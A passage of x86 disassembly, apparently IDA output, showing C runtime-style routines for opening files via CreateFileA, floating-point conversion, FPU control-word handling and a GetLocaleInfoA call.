jmp short loc_41FA33
; ---------------------------------------------------------------------------
loc_41F9F2: ; CODE XREF: sub_41F8F5+D3�j
; sub_41F8F5+D7�j
mov [ebp+var_C], ebx
jmp short loc_41FA33
; ---------------------------------------------------------------------------
loc_41F9F7: ; CODE XREF: sub_41F8F5+D1�j
cmp eax, 500h
jz short loc_41FA2C
cmp eax, 600h
jz short loc_41FA23
cmp eax, edx
jz short loc_41FA2C
loc_41FA09: ; CODE XREF: sub_41F8F5+E9�j
call sub_41B9A5
mov dword ptr [eax], 16h
call sub_41B9AE
mov [eax], esi
loc_41FA1B: ; CODE XREF: sub_41F8F5+2E2�j
or eax, 0FFFFFFFFh
jmp loc_41FB8C
; ---------------------------------------------------------------------------
loc_41FA23: ; CODE XREF: sub_41F8F5+E2�j
; sub_41F8F5+10E�j
mov [ebp+var_C], 5
jmp short loc_41FA33
; ---------------------------------------------------------------------------
loc_41FA2C: ; CODE XREF: sub_41F8F5+107�j
; sub_41F8F5+112�j
mov [ebp+var_C], 1
loc_41FA33: ; CODE XREF: sub_41F8F5+F2�j
; sub_41F8F5+FB�j ...
mov eax, [ebp+arg_C]
test eax, edi
mov esi, 80h
jz short loc_41FA51
mov ecx, dword_481180
not ecx
and ecx, [ebp+arg_10]
test cl, cl
js short loc_41FA51
xor esi, esi
inc esi
loc_41FA51: ; CODE XREF: sub_41F8F5+148�j
; sub_41F8F5+157�j
test al, 40h
jz short loc_41FA6C
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_481184, 2
jnz short loc_41FA6C
or [ebp+var_8], 4
loc_41FA6C: ; CODE XREF: sub_41F8F5+15E�j
; sub_41F8F5+171�j
test ah, 10h
jz short loc_41FA73
or esi, edi
loc_41FA73: ; CODE XREF: sub_41F8F5+17A�j
test al, 20h
jz short loc_41FA7F
or esi, 8000000h
jmp short loc_41FA89
; ---------------------------------------------------------------------------
loc_41FA7F: ; CODE XREF: sub_41F8F5+180�j
test al, 10h
jz short loc_41FA89
or esi, 10000000h
loc_41FA89: ; CODE XREF: sub_41F8F5+188�j
; sub_41F8F5+18C�j
call sub_41F651
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41FAB1
call sub_41B9A5
mov dword ptr [eax], 18h
call sub_41B9AE
and dword ptr [eax], 0
loc_41FAAA: ; CODE XREF: sub_41F8F5+208�j
mov eax, ebx
jmp loc_41FB8C
; ---------------------------------------------------------------------------
loc_41FAB1: ; CODE XREF: sub_41F8F5+1A0�j
mov eax, [ebp+arg_0]
push 0
push esi
push [ebp+var_C]
mov dword ptr [eax], 1
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_8]
call dword_422034 ; CreateFileA
mov esi, eax
cmp esi, ebx
jz short loc_41FAF0
push esi
call dword_4221D4 ; GetFileType
test eax, eax
jnz short loc_41FAFF
push esi
call dword_42202C ; CloseHandle
loc_41FAF0: ; CODE XREF: sub_41F8F5+1E7�j
call dword_422008 ; RtlGetLastWin32Error
push eax
call sub_41B9B7
pop ecx
jmp short loc_41FAAA
; ---------------------------------------------------------------------------
loc_41FAFF: ; CODE XREF: sub_41F8F5+1F2�j
cmp eax, 2
jnz short loc_41FB0A
or [ebp+var_1], 40h
jmp short loc_41FB13
; ---------------------------------------------------------------------------
loc_41FB0A: ; CODE XREF: sub_41F8F5+20D�j
cmp eax, 3
jnz short loc_41FB13
or [ebp+var_1], 8
loc_41FB13: ; CODE XREF: sub_41F8F5+213�j
; sub_41F8F5+218�j
push esi
push edi
call sub_41F480
or [ebp+var_1], 1
mov eax, edi
sar eax, 5
lea ebx, ds:481600h[eax*4]
mov eax, edi
and eax, 1Fh
lea esi, [eax+eax*8]
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, [ebx]
shl esi, 2
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [esi+ecx+4], al
jnz short loc_41FB75
test al, al
jns short loc_41FB75
test byte ptr [ebp+arg_C], 2
jz short loc_41FB75
push 2
push 0FFFFFFFFh
push edi
call sub_41D6E6
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41FB91
call sub_41B9AE
cmp dword ptr [eax], 83h
jnz short loc_41FBD0
loc_41FB75: ; CODE XREF: sub_41F8F5+252�j
; sub_41F8F5+256�j ...
cmp [ebp+var_1], 0
jnz short loc_41FB8A
test byte ptr [ebp+arg_C], 8
jz short loc_41FB8A
mov eax, [ebx]
lea eax, [esi+eax+4]
or byte ptr [eax], 20h
loc_41FB8A: ; CODE XREF: sub_41F8F5+284�j
; sub_41F8F5+28A�j
mov eax, edi
loc_41FB8C: ; CODE XREF: sub_41F8F5+129�j
; sub_41F8F5+1B7�j
pop edi
loc_41FB8D: ; CODE XREF: sub_41F8F5+9C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41FB91: ; CODE XREF: sub_41F8F5+271�j
and [ebp+var_2], 0
push 1
lea eax, [ebp+var_2]
push eax
push edi
call sub_41B287
add esp, 0Ch
test eax, eax
jnz short loc_41FBBE
cmp [ebp+var_2], 1Ah
jnz short loc_41FBBE
push [ebp+var_10]
push edi
call sub_4209FE
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_41FBD0
loc_41FBBE: ; CODE XREF: sub_41F8F5+2B1�j
; sub_41F8F5+2B7�j
push 0
push 0
push edi
call sub_41D6E6
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41FB75
loc_41FBD0: ; CODE XREF: sub_41F8F5+27E�j
; sub_41F8F5+2C7�j
push edi
call sub_41AD93
pop ecx
jmp loc_41FA1B
sub_41F8F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FBDC proc near ; CODE XREF: sub_41B83D+137�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset stru_42CB68
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
mov ecx, [ebp+arg_8]
call sub_41F8F5
add esp, 14h
mov [ebp+var_24], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41FC21
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41FBDC endp
; =============== S U B R O U T I N E =======================================
sub_41FC21 proc near ; CODE XREF: sub_41FBDC+37�p
; DATA XREF: .text:stru_42CB68�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_41FC30
push dword ptr [ebp-20h]
call sub_41F62F
pop ecx
locret_41FC30: ; CODE XREF: sub_41FC21+4�j
retn
sub_41FC21 endp
; =============== S U B R O U T I N E =======================================
sub_41FC31 proc near ; CODE XREF: sub_41FCB0+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_41FC59
loc_41FC50: ; CODE XREF: sub_41FC31+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41FC53: ; CODE XREF: sub_41FC31+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41FC50
loc_41FC59: ; CODE XREF: sub_41FC31+1D�j
inc eax
cmp eax, 3
jl short loc_41FC53
xor eax, eax
inc eax
retn
sub_41FC31 endp
; =============== S U B R O U T I N E =======================================
sub_41FC63 proc near ; CODE XREF: sub_41FCB0+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_420B39
add esp, 0Ch
dec esi
js short loc_41FCAD
lea edi, [edi+esi*4]
loc_41FC94: ; CODE XREF: sub_41FC63+48�j
test eax, eax
jz short loc_41FCAD
push edi
push 1
push dword ptr [edi]
call sub_420B39
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41FC94
loc_41FCAD: ; CODE XREF: sub_41FC63+2C�j
; sub_41FC63+33�j
pop edi
pop esi
retn
sub_41FC63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FCB0 proc near ; CODE XREF: sub_41FDD1+79�p
; sub_41FDD1+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_41FCFF
lea ecx, [edi+1]
push ecx
push eax
call sub_41FC31
test eax, eax
pop ecx
pop ecx
jnz short loc_41FCFC
push edi
push [ebp+arg_0]
call sub_41FC63
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_41FCFC: ; CODE XREF: sub_41FCB0+3C�j
mov eax, [ebp+arg_0]
loc_41FCFF: ; CODE XREF: sub_41FCB0+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_41FD1A
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_41FD1A: ; CODE XREF: sub_41FCB0+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41FCB0 endp
; =============== S U B R O U T I N E =======================================
sub_41FD22 proc near ; CODE XREF: sub_41FDD1+6D�p
; sub_41FDD1+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_41FD30: ; CODE XREF: sub_41FD22+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41FD30
pop esi
retn
sub_41FD22 endp
; =============== S U B R O U T I N E =======================================
sub_41FD3D proc near ; CODE XREF: sub_41FDD1+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_41FD3F: ; CODE XREF: sub_41FD3D+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41FD53
inc eax
cmp eax, 3
jl short loc_41FD3F
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41FD53: ; CODE XREF: sub_41FD3D+A�j
xor eax, eax
retn
sub_41FD3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD56 proc near ; CODE XREF: sub_41FDD1+B6�p
; sub_41FDD1+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_41FD84: ; CODE XREF: sub_41FD56+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_41FD84
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_41FDB4: ; CODE XREF: sub_41FD56+74�j
cmp eax, [ebp+var_8]
jl short loc_41FDC0
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_41FDC4
; ---------------------------------------------------------------------------
loc_41FDC0: ; CODE XREF: sub_41FD56+61�j
and dword ptr [ebx+eax*4], 0
loc_41FDC4: ; CODE XREF: sub_41FD56+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_41FDB4
pop edi
pop esi
pop ebx
leave
retn
sub_41FD56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDD1 proc near ; CODE XREF: sub_41FF29+D�p
; sub_41FF3F+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_41FE3A
xor ebx, ebx
call sub_41FD3D
test eax, eax
pop ecx
jnz loc_41FEE9
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_41FE32: ; CODE XREF: sub_41FDD1+DA�j
push 2
pop eax
jmp loc_41FEEB
; ---------------------------------------------------------------------------
loc_41FE3A: ; CODE XREF: sub_41FDD1+49�j
lea eax, [ebp+var_18]
push eax
call sub_41FD22
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41FCB0
add esp, 10h
test eax, eax
jz short loc_41FE57
inc edi
loc_41FE57: ; CODE XREF: sub_41FDD1+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_41FE6D
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_41FEA9
; ---------------------------------------------------------------------------
loc_41FE6D: ; CODE XREF: sub_41FDD1+90�j
cmp edi, eax
jg short loc_41FEAD
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41FD22
lea eax, [ebp+var_C]
push edi
push eax
call sub_41FD56
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41FCB0
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41FD56
add esp, 20h
loc_41FEA9: ; CODE XREF: sub_41FDD1+9A�j
xor ebx, ebx
jmp short loc_41FE32
; ---------------------------------------------------------------------------
loc_41FEAD: ; CODE XREF: sub_41FDD1+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_41FED5
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41FD56
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_41FEEB
; ---------------------------------------------------------------------------
loc_41FED5: ; CODE XREF: sub_41FDD1+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_41FD56
pop ecx
pop ecx
loc_41FEE9: ; CODE XREF: sub_41FDD1+55�j
xor eax, eax
loc_41FEEB: ; CODE XREF: sub_41FDD1+64�j
; sub_41FDD1+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_41FF1A
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_41FF24
; ---------------------------------------------------------------------------
loc_41FF1A: ; CODE XREF: sub_41FDD1+13A�j
cmp esi, 20h
jnz short loc_41FF24
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_41FF24: ; CODE XREF: sub_41FDD1+147�j
; sub_41FDD1+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FDD1 endp
; =============== S U B R O U T I N E =======================================
sub_41FF29 proc near ; CODE XREF: sub_41FF55+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_432DD0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41FDD1
add esp, 0Ch
retn
sub_41FF29 endp
; =============== S U B R O U T I N E =======================================
sub_41FF3F proc near ; CODE XREF: sub_41FF98+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_432DE8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41FDD1
add esp, 0Ch
retn
sub_41FF3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF55 proc near ; CODE XREF: sub_41BBED+12�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_432A68
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_420CF7
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41FF29
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41C596
leave
retn
sub_41FF55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF98 proc near ; CODE XREF: sub_41BBED+2D�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_432A68
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_420CF7
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41FF3F
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41C596
leave
retn
sub_41FF98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FFDB proc near ; CODE XREF: sub_41BCF6+4D�p
; sub_41BE06+41�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_420018
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41FFFE: ; CODE XREF: sub_41FFDB+38�j
mov dl, [ecx]
test dl, dl
jz short loc_42000A
movsx edx, dl
inc ecx
jmp short loc_42000D
; ---------------------------------------------------------------------------
loc_42000A: ; CODE XREF: sub_41FFDB+27�j
push 30h
pop edx
loc_42000D: ; CODE XREF: sub_41FFDB+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41FFFE
mov edx, [ebp+arg_8]
loc_420018: ; CODE XREF: sub_41FFDB+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_420031
cmp byte ptr [ecx], 35h
jl short loc_420031
jmp short loc_420029
; ---------------------------------------------------------------------------
loc_420026: ; CODE XREF: sub_41FFDB+52�j
mov byte ptr [eax], 30h
loc_420029: ; CODE XREF: sub_41FFDB+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_420026
inc byte ptr [eax]
loc_420031: ; CODE XREF: sub_41FFDB+42�j
; sub_41FFDB+47�j
cmp byte ptr [esi], 31h
jnz short loc_42003B
inc dword ptr [edx+4]
jmp short loc_42004D
; ---------------------------------------------------------------------------
loc_42003B: ; CODE XREF: sub_41FFDB+59�j
push edi
call sub_419D70
inc eax
push eax
push edi
push esi
call sub_41F060
add esp, 10h
loc_42004D: ; CODE XREF: sub_41FFDB+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41FFDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420052 proc near ; CODE XREF: sub_42010C+1B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_4200A2
cmp ebx, edi
jz short loc_42009B
lea edi, [ecx+3C00h]
jmp short loc_4200C3
; ---------------------------------------------------------------------------
loc_42009B: ; CODE XREF: sub_420052+3F�j
mov edi, 7FFFh
jmp short loc_4200C3
; ---------------------------------------------------------------------------
loc_4200A2: ; CODE XREF: sub_420052+3B�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_4200BA
cmp edx, ebx
jnz short loc_4200BA
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_420107
; ---------------------------------------------------------------------------
loc_4200BA: ; CODE XREF: sub_420052+54�j
; sub_420052+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_4200C3: ; CODE XREF: sub_420052+47�j
; sub_420052+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_4200FE
loc_4200DF: ; CODE XREF: sub_420052+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_4200DF
loc_4200FE: ; CODE XREF: sub_420052+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_420107: ; CODE XREF: sub_420052+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_420052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42010C proc near ; CODE XREF: sub_41BCF6+23�p
; sub_41BE06+22�p ...
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A68
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_420052
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_421131
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_2A]
mov [esi], eax
movsx eax, [ebp+var_2C]
mov [esi+4], eax
lea eax, [ebp+var_28]
push eax
push edi
call sub_41BFE0
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
call sub_41C596
pop edi
pop esi
leave
retn
sub_42010C endp
; ---------------------------------------------------------------------------
push 2
call sub_41865A
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_420187 proc near ; CODE XREF: sub_4202A7+C�p
xor eax, eax
test bl, 1
jz short loc_420191
push 10h
pop eax
loc_420191: ; CODE XREF: sub_420187+5�j
test bl, 4
jz short loc_420199
or eax, 8
loc_420199: ; CODE XREF: sub_420187+D�j
test bl, 8
jz short loc_4201A1
or eax, 4
loc_4201A1: ; CODE XREF: sub_420187+15�j
test bl, 10h
jz short loc_4201A9
or eax, 2
loc_4201A9: ; CODE XREF: sub_420187+1D�j
test bl, 20h
jz short loc_4201B1
or eax, 1
loc_4201B1: ; CODE XREF: sub_420187+25�j
test bl, 2
jz short loc_4201BB
or eax, 80000h
loc_4201BB: ; CODE XREF: sub_420187+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_4201F7
cmp ecx, 400h
jz short loc_4201F2
cmp ecx, 800h
jz short loc_4201EE
cmp ecx, esi
jnz short loc_4201F7
or eax, edi
jmp short loc_4201F7
; ---------------------------------------------------------------------------
loc_4201EE: ; CODE XREF: sub_420187+5D�j
or eax, ebp
jmp short loc_4201F7
; ---------------------------------------------------------------------------
loc_4201F2: ; CODE XREF: sub_420187+55�j
or eax, 100h
loc_4201F7: ; CODE XREF: sub_420187+4D�j
; sub_420187+61�j ...
and edx, edi
jz short loc_420206
cmp edx, ebp
jnz short loc_42020B
or eax, 10000h
jmp short loc_42020B
; ---------------------------------------------------------------------------
loc_420206: ; CODE XREF: sub_420187+72�j
or eax, 20000h
loc_42020B: ; CODE XREF: sub_420187+76�j
; sub_420187+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_420218
or eax, 40000h
locret_420218: ; CODE XREF: sub_420187+8A�j
retn
sub_420187 endp
; =============== S U B R O U T I N E =======================================
sub_420219 proc near ; CODE XREF: sub_4202A7+22�p
xor eax, eax
test bl, 10h
jz short loc_420221
inc eax
loc_420221: ; CODE XREF: sub_420219+5�j
test bl, 8
jz short loc_420229
or eax, 4
loc_420229: ; CODE XREF: sub_420219+B�j
test bl, 4
jz short loc_420231
or eax, 8
loc_420231: ; CODE XREF: sub_420219+13�j
test bl, 2
jz short loc_420239
or eax, 10h
loc_420239: ; CODE XREF: sub_420219+1B�j
test bl, 1
jz short loc_420241
or eax, 20h
loc_420241: ; CODE XREF: sub_420219+23�j
test ebx, 80000h
jz short loc_42024C
or eax, 2
loc_42024C: ; CODE XREF: sub_420219+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_420280
cmp ecx, 100h
jz short loc_42027B
cmp ecx, esi
jz short loc_420274
cmp ecx, edx
jnz short loc_420280
or eax, 0C00h
jmp short loc_420280
; ---------------------------------------------------------------------------
loc_420274: ; CODE XREF: sub_420219+4E�j
or eax, 800h
jmp short loc_420280
; ---------------------------------------------------------------------------
loc_42027B: ; CODE XREF: sub_420219+4A�j
or eax, 400h
loc_420280: ; CODE XREF: sub_420219+42�j
; sub_420219+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_420296
cmp ecx, 10000h
jnz short loc_420298
or eax, esi
jmp short loc_420298
; ---------------------------------------------------------------------------
loc_420296: ; CODE XREF: sub_420219+6F�j
or eax, edx
loc_420298: ; CODE XREF: sub_420219+77�j
; sub_420219+7B�j
test ebx, 40000h
pop esi
jz short locret_4202A6
or eax, 1000h
locret_4202A6: ; CODE XREF: sub_420219+86�j
retn
sub_420219 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4202A7 proc near ; CODE XREF: sub_4202D9+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_420187
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_420219
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_4202A7 endp
; =============== S U B R O U T I N E =======================================
sub_4202D9 proc near ; CODE XREF: sub_41BF5F+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_4202A7
pop ecx
pop ecx
retn
sub_4202D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4202EF proc near ; CODE XREF: sub_41C1A9+27D�p
; sub_41E950+15E�p ...
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_432A68
xor eax, [ebp+4]
and [ebp+var_6], 0
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
call dword_42211C ; GetLocaleInfoA
test eax, eax
jnz short loc_420321
or eax, 0FFFFFFFFh
jmp short loc_42032B
; ---------------------------------------------------------------------------
